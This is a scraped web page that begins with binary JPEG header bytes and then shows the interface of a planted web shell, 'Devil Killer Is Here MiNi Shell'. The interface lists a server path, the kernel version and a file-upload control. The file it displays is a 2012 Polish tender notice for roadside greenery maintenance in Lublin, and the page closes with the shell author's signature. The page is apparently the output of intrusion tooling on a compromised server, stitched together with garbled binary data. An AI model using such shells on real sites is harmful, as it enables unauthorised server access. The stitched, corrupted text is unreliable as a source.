JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120716/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120716/253330-N-2012.html

<p class="kh_header"><b>Lublin: Bieżące utrzymanie, kompleksowa konserwacja i renowacja zieleni w pasach drogowych miasta Lublin w  rejonie VIII LSM, obejmującym wszelką zieleń przyuliczną pozostającą w administrowaniu Zarządu Dróg i Mostów w Lublinie. Granice rejonu nr VIII LSM stanowią: ul. Głęboka, ul. Nadbystrzycka, ul. Pozytywistów, ul. Filaretów, ul. Bohaterów Monte Cassino, al. Kraśnicka. Do rejonu nie należy al. Kraśnicka.</b><br>
<b>Numer ogłoszenia: 253330 - 2012; data zamieszczenia: 16.07.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zarząd Dróg i Mostów w Lublinie , ul. Krochmalna 13j, 20-401 Lublin, woj. lubelskie, tel. 81 466 5700, faks 81 466 5701.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> zdm.bip.lublin.eu</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: gminna jednostka budżetowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Bieżące utrzymanie, kompleksowa konserwacja i renowacja zieleni w pasach drogowych miasta Lublin w  rejonie VIII LSM, obejmującym wszelką zieleń przyuliczną pozostającą w administrowaniu Zarządu Dróg i Mostów w Lublinie. Granice rejonu nr VIII LSM stanowią: ul. Głęboka, ul. Nadbystrzycka, ul. Pozytywistów, ul. Filaretów, ul. Bohaterów Monte Cassino, al. Kraśnicka. Do rejonu nie należy al. Kraśnicka..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zakres zamówienia obejmuje wszelkie prace związane z wykonywaniem robót konserwacyjnych, porządkowych i innych w zakresie zielni do których zalicza się n/w grupy robót:

1. Prace porządkowe:
1.1.Czynności wykonywane w zależności od potrzeb, dotyczące utrzymania czystości terenów zieleni w pasach drogowych ulic miasta Lublin w rejonie nr VIII,
1.2.Odcięcie darni z terenu trawnika przylegającego do krawężnika lub obrzeża,
1.3.Ścięcie darni lub gracowanie rabat niezależnie od nawierzchni,
1.4.Powierzchniowe oczyszczenie terenu zielonego nieobjętego stałym utrzymaniem.

2. Pielęgnacja drzew i krzewów:
2.1.Ścinanie drzew niezależnie od twardości o obwodzie pnia do 65cm (obwód mierzony na 	wys. 130cm od ziemi, drewno ze ściętych drzew do dyspozycji Wykonawcy),
2.2.J.w. lecz drzewo o obwodzie pnia od 66 do 125 cm,
2.3.J.w. lecz drzewo o obwodzie pnia od 126 do 205 cm, 
2.4.J.w. lecz drzewo o obwodzie pnia od 206 do 250 cm,
2.5.J.w. lecz drzewo o obwodzie pnia powyżej 250 cm,
2.6.Usuwanie lub frezowanie pni do głębokości 25 - 35 cm, niezależnie od twardości, o obwodzie pnia do 65cm,
2.7.J.w. lecz o obwodzie pnia od 66 do 125 cm,
2.8.J.w. lecz o obwodzie pnia od 126 do 205 cm,
2.9.J.w lecz o obwodzie pnia od 206 do 250 cm,
2.10.J.w. lecz o obwodzie pnia powyżej 250 cm.
2.11.Zabiegi pielęgnacyjne w koronach drzew niezależnie od twardości o obwodzie pnia do 65cm (obwód mierzony na wysokości 130 cm od ziemi),
2.12.J. w. lecz pnia o obwodzie 66 cm do 125 cm,
2.13.J. w. lecz pnia o obwodzie 126 cm do 205 cm,
2.14.J. w. lecz pnia o obwodzie 206 cm do 250 cm, 
2.15.J. w. lecz pnia o obwodzie powżej 250 cm,
2.16.Wykonanie cięć technicznych. Usunięcie gałęzi (drzew) kolidujących ze znakami, sygnalizatorami 	świetlnymi oraz budynkami lub wchodzących w skrajnię drogi.
2.17.Wykonanie cięć technicznych. Usunięcie gałęzi (krzewów) kolidujących ze znakami, sygnalizatorami świetlnymi oraz budynkami lub wchodzących w skrajnię drogi, 
2.18.Usuwanie zanieczyszczeń z gałęzi w koronie drzewa przy użyciu drabiny lub podnośnika,
2.19.Sadzenie drzew iglastych z bryłą korzeniową lub w pojemnikach o pojemności minimum 10l, z materiałem roślinnym I klasy (sadzonka I klasy o wysokości minimum 120cm, materiał zdrowy, czysty odmianowo bez uszkodzeń) - materiał Wykonawcy,
2.20.Sadzenie drzew liściastych z bryłą korzeniową lub w pojemnikach o pojemności minimum 10l, 	z materiałem roślinnym I klasy (sadzonka I klasy o obwodzie pnia 10cm na wysokości 100cm, materiał zdrowy, czysty odmianowo bez uszkodzeń z koroną minimum 3-letnią) - materiał Wykonawcy,
2.21.Sadzenie krzewów iglastych z bryłą korzeniową lub w pojemnikach o pojemności minimum 5l, a materiałem roślinnym I klasy (zdrowy, bez patogenów, czysty odmianowo z dobrze rozwiniętym systemem korzeniowym, rośliny zdrewniałe, zahartowane, równomiernie rozkrzewione) - materiał Wykonawcy,
2.22. Sadzenie krzewów liściastych z bryłą korzeniową lub w pojemnikach o pojemności minimum 3l z materiałem roślinnym I klasy (zdrowy, bez patogenów, czysty odmianowo z dobrze rozwiniętym systemem korzeniowym, rośliny zdrewniałe, zahartowane, równomiernie rozkrzewione) - materiał Wykonawcy,
2.23.Sadzenie róż z bryłą korzeniową lub w pojemnikach o pojemności minimum 2l z materiałem roślinnym I klasy (zdrowy, bez patogenów, czysty odmianowo z dobrze rozwiniętym systemem korzeniowym) - materiał Wykonawcy,
2.24.Sadzenie żywopłotów - materiał  roślinny kopany z gruntu I klasy (zdrowy bez 	patogenów, czysty odmianowo z dobrze rozwiniętym systemem korzeniowym, minimum 	3 pędy, minimalna wysokość od 40cm do 60cm) - materiał Wykonawcy,
2.25.Wymiana pali lub montaż nowych przy drzewach nie posiadających pali - materiał 	Wykonawcy,
2.26.Wymiana wiązadeł lub montaż nowych przy drzewach nie posiadających wiązadeł  - materiał Wykonawcy,
2.27.Wymiana drewnianych poprzeczek lub montaż nowych przy drzewach nie posiadających poprzeczek - materiał Wykonawcy,
2.28.Demontaż opalikowania,
2.29.Podlewanie drzewek i krzewów - materiał Wykonawcy,
2.30.Usuwanie odrostów korzeniowych, niezależnie od ilości odrostów,
2.31.Usuwanie odrostów wyrastających na pniu drzewa (od podstawy pnia do nasady korony), niezależnie od ilości odrostów,
2.32.Przekopanie i pielenie misek wokół drzew,
2.33.Wypełnienie misek wokół drzew żwirem (8-16mm) - materiał Wykonawcy,
2.34.Wypełnienie misek wokół drzew grysem dolomitowym (2-5mm) - materiał Wykonawcy,
2.35.Wypełnienie misek wokół drzew korą drzew iglastych  (2-5mm) - materiał Wykonawcy,
2.36.Układanie maty szkółkarskiej,
2.37.Przekopanie i pielenie skupin krzewów,
2.38.Karczowanie drzewek o obwodzie do 20cm i wieku do 10 lat oraz krzewów,
2.39.Odmładzanie krzewów,
2.40.Cięcie krzewów,
2.41.Cięcie żywopłotów letnie z ziemi (przy maksymalnej wysokości żywopłotu do 150cm),
2.42.Cięcie żywopłotów zimowe z ziemi (przy maksymalnej wysokości żywopłotu do 150 cm),
2.43.Cięcie żywopłotów letnie z podestów (przy wysokości żywopłotu powyżej 150cm),
2.44.Cięcie żywopłotów zimowe z podestów (przy wysokości żywopłotu powyżej 150cm),
2.45.Odmłodzenie żywopłotów,
2.46. Karczowanie żywopłotów formowanych o wysokości do 2m,
2.47. Karczowanie żywopłotów nieformowanych o wysokości ponad 2m,
2.48. Odchwaszczanie żywopłotów,
2.49. Przesadzanie drzew z bryłą korzeniową o obwodzie do 250cm,
2.50. Prostowanie drzew pochylonych przez wiatr lub pojazdy mechaniczne - materiał Wykonawcy,
2.51. Oprysk drzew środkami chemicznej ochrony roślin - materiał Wykonawcy,
2.52. Oprysk krzewów środkami chemicznej ochrony roślin - materiał Wykonawcy,
2.53. Oprysk żywopłotów środkami chemicznej ochrony roślin - materiał Wykonawcy,
2.54. Ręczne ścinanie i karczowanie zarośli i zadrzewień,
2.55. Opracowanie pełnej dokumentacji oraz ekspertyzy dotyczącej oceny stanu zdrowotnego drzew lub krzewów,

3.Konserwacja trawników:
3.1. Wygrabienie liści z trawników, skupin krzewów  i żywopłotów,
3.2. Zbieranie worków (pojemność 120l) wypełnionych liśćmi lub pryzm (0,12 m3) zgrabionych przez mieszkańców z terenów zielonych w pasie drogowym,
3.3. Koszenie trawników objętych stałym utrzymaniem - teren płaski,
3.4. Koszenie trawników nie objętych stałym utrzymaniem - teren płaski,
3.5. Koszenie trawników  objętych stałym utrzymaniem - na skarpach,
3.6. Koszenie trawników  nie objętych stałym utrzymaniem - na skarpach,
3.7. Koszenie trawników objętych stałym utrzymaniem z mechanicznym zebraniem trawy - teren płaski,
3.8. Wykaszanie chwastów i jednorocznych samosiewów z terenów objętych stałym utrzymaniem,
3.9. Wykaszanie chwastów i jednorocznych samosiewów z terenów nie objętych stałym utrzymaniem,
3.10. Grabienie skoszonej trawy na terenie płaskim,
3.11. Grabienie skoszonej trawy na skarpach
3.12. Ręczne pielenie trawników, 
3.13. Włókowanie trawników,
3.14. Nawożenie trawników i skupin krzewów nawozami mineralnymi - materiał Wykonawcy,
3.15. Oprysk trawników herbicydami - materiał Wykonawcy,
3.16. Wykonanie trawników metodą darniowania - materiał Wykonawcy,
3.17. Założenie trawników dywanowych przy uprawie ręcznej w terenie płaskim - materiał Wykonawcy,
3.18. Założenie trawników dywanowych przy uprawie ręcznej na skarpach - materiał Wykonawcy,
3.19. Założenie trawników dywanowych przy uprawie mechanicznej - materiał Wykonawcy,
3.20. Dowiezienie ziemi ogrodniczej,
3.21. Wywiezienie nadmiaru ziemi.
3.22. Aeracja trawników.

4. Pielęgnacja kwietników:
4.1.Przygotowanie rabat kwiatowych do obsady z uzupełnieniem ziemią kompostową lub torfem - materiał Wykonawcy,
4.2.Przygotowanie rabat kwiatowych do obsady bez uzupełniania ziemią,
4.3.Likwidacja nasadzeń sezonowych na rabacie,
4.4.Sadzenie kwiatów jednorocznych dostarczonych przez Zamawiającego
4.5.Pielenie i spulchnianie rabat z roślin sezonowych,
4.6.Pielenie i spulchnianie rabat z róż,
4.7.Obcinanie przekwitłych kwiatostanów i zbędnych pędów u kwiatów jednorocznych,
4.8.Obcinanie przekwitłych kwiatostanów i zbędnych pędów u róż,
4.9.Podlewanie rabat - materiał Wykonawcy,
4.10.Przycięcie krzewów róż w okresie spoczynku,
4.11.Przykrycie krzewów róż na zimę  - materiał Wykonawcy,
4.12.Odkrycie róż na wiosnę,
4.13.Nawożenie różarek torfem lub kompostem - materiał Wykonawcy,
4.14.Nawożenie rabat nawozami mineralnymi - materiał Wykonawcy,
4.15.Oprysk róż chemikaliami - materiał Wykonawcy,
4.16.Demontaż donic z zasadzonymi kwiatami - materiał Zamawiającego,
1.1.4.17.Demontaż skrzynek z zasadzonymi kwiatami - materiał Zamawiającego..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 77.31.00.00-6, 45.11.12.91-4, 45.11.27.00-2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 28.02.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Nie ma wymogu wnoszenia wadium przez wykonawców.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Jako spełniający warunki udziału w postępowaniu zostaną ocenieni wykonawcy, którzy wykażą :

1. posiadanie aktualnego zezwolenia na odbieranie odpadów komunalnych od właścicieli nieruchomości z terenu miasta Lublin obejmujące odbiór odpadów powstałych w wyniku prowadzonej przez Wykonawcę pielęgnacji terenów zielonych zgodnie z ustawą z dnia 13 września 1996 r. o utrzymaniu czystości i porządku w gminach (Dz. U. z 2005 r. Nr 236, poz. 2008 z późn. zm) lub posiadanie wpisu do rejestru działalności regulowanej w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości zgodnie z ustawą z dnia 13 września 1996 r. o utrzymaniu czystości i porządku w gminach (Dz. U. z 2005 r. Nr 236, poz. 2008 z późn. zm).

2. posiadanie aktualnego zezwolenia na transport odpadów zgodnie z ustawą z dnia 27 kwietnia 2001 r. o odpadach (Dz.U. z 2010 r. Nr 185, poz. 1243 z późn. zm.)</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Jako spełniający warunki udziału w postępowaniu zostaną ocenieni wykonawcy, którzy wykażą wykonanie lub wykonywanie usług w zakresie utrzymania i/lub kompleksowej konserwacji i/lub renowacji zieleni o areale min. 20ha na terenach miejskich o łącznej średniorocznej wartości prac nie mniejszej niż 50.000,00 zł brutto, w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Jako spełniający warunki udziału w postępowaniu zostaną ocenieni wykonawcy, którzy wykażą dysponowanie niezbędnymi do wykonania narzędziami i urządzeniami:
- rębarka do gałęzi - min. 1 szt., 
- kosy spalinowe - min. 10szt., 
- piły spalinowe - min. 3 szt., 
- kosiarki samojezdne o mocy silnika minimum 5kW - min. 4 szt., 
- kosiarki ciągnikowe do koszenia terenów miejskich - min. 3 szt., 
- samochód ciężarowy o minimalnej ładowności do 5 ton lub ciągnik z przyczepą - min. 3 pojazdy, 
- piły na wysięgniku - min. 1 szt., 
- nożyce do żywopłotów - min. 10szt., 
- podnośnik koszowy o wysięgu minimum 18 m - min. 1szt.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Jako spełniający warunki udziału w postępowaniu zostaną ocenieni wykonawcy, którzy wykażą dysponowanie min. 10 osobami do realizacji robót (pracownicy fizyczni)</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Formularz ofertowy - w przypadku składania oferty przez podmioty występujące wspólnie należy podać nazwy (firmy) oraz dokładne adresy wszystkich wykonawców składających ofertę wspólną. 

2. Oświadczenie o części zamówienia, której wykonanie, wykonawca zamierza powierzyć podwykonawcom w przypadku powierzenia przez wykonawcę części zamówienia podwykonawcom. 

3. Wycenę ofertową. 

4. Pełnomocnictwo do reprezentowania w postępowaniu albo do reprezentowania w postępowaniu i zawarcia umowy, w przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia zgodnie z art. 23 ustawy Pzp (dotyczy również wspólników spółki cywilnej). 

5. Pełnomocnictwo do występowania w imieniu wykonawcy, w przypadku gdy dokumentów składających się na ofertę nie podpisuje osoba uprawniona do reprezentowania wykonawcy lub wykonawca - w przypadku osób fizycznych. 

6. Wykonawca, w sytuacji, gdy polega na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków, zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia. 

7. Jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w III.4.3), zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania - wystawionym nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.Dopuszczalne są następujące rodzaje i warunki zmiany treści umowy - zmiana stawki i kwoty podatku VAT. 

2. Zmiany umowy przewidziane w pkt 1 dopuszczone są w następujących warunkach - stawka i kwota podatku VAT ulegną zmianie odpowiednio do przepisów prawa wprowadzających zmianę.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> zdm.bip.lublin.eu<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zarząd Dróg i Mostów w Lublinie, 20-401 Lublin, ul.Krochmalna 13j, pok.9 (I p.) po okazaniu dowodu wpłaty 5zł na konto: 27 1240 1503 1111 0010 4020 1730 (lub za zal. pocztowym (5zł+koszt przesyłki).</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 24.07.2012 godzina 09:30, miejsce: Zarząd Dróg i Mostów w Lublinie, 20-401 Lublin, ul.Krochmalna 13j, pokój nr 9 (I piętro).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 1. Osobami upoważnionymi do kontaktowania się z wykonawcami są:

1.1. W zakresie przedmiotu zamówienia: p. Kamila Garwolińska - Zarząd Dróg i Mostów w Lublinie, ul. Krochmalna 13i pok. nr 103 (I piętro), telefon 81-466-2579.

1.2. W zakresie procedury: p. Mariusz Przybysz - Zarząd Dróg i Mostów w Lublinie - ul. Krochmalna 13j piętro I, pokój nr 9, telefon 81-466-57-10.

2. Termin wykonania zamówienia:
- od dnia 01.08.2012 r. do dnia 28.02.2013 r. - w przypadku zawarcia umowy przed 	01.08.2012 r.;
- od dnia zawarcia umowy do dnia 28.02.2013 r. - w przypadku zawarcia umowy po 	01.08.2012 r..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com